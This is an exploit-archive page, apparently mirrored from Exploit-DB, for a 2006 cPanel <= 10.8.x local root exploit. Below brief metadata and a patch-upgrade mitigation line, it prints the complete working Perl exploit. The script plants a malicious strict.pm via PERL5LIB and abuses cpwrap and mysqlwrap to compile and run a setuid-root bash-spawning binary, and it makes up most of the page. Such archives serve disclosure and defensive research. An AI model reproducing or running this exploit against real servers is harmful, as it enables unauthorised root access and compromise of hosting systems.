cPanel - exploit.company

vendor:

cPanel

by:

milw0rm.com

7,2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: cPanel

Affected Version From: cPanel <= 10.8.x

Affected Version To: cPanel <= 10.8.x

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2006

cPanel <= 10.8.x cpwrap root exploit via mysqladmin

This exploit is used to gain root access on cPanel <= 10.8.x systems. It uses the cpwrap and mysqlwrap binaries to create a malicious strict.pm file, which is then used to compile a setuid root binary. The malicious binary is then executed to gain root access.

Mitigation:

Upgrade to the latest version of cPanel, or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w

# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# use strict; # haha oh wait..

my $cpwrap       = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap    = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd          = `pwd`;

chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";

if ( ! -x "/usr/bin/gcc" )  { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" )       { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" )    { die "$mysqlwrap: $!\n"; }

open  (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) {
   if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);

open  (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print  STRICT  "\$e  = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print  STRICT  "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print  STRICT  "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print  STRICT  "system(\"/bin/chmod 4755 Maildir\");\n";
print  STRICT  "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);

system("$mysqlwrap DUMPMYSQL 2>/dev/null");

if ( -e "Maildir" ) {
   system("./Maildir");
}
else {
   unlink "strict.pm";
   die "Failed\n";
}

# milw0rm.com [2006-10-01]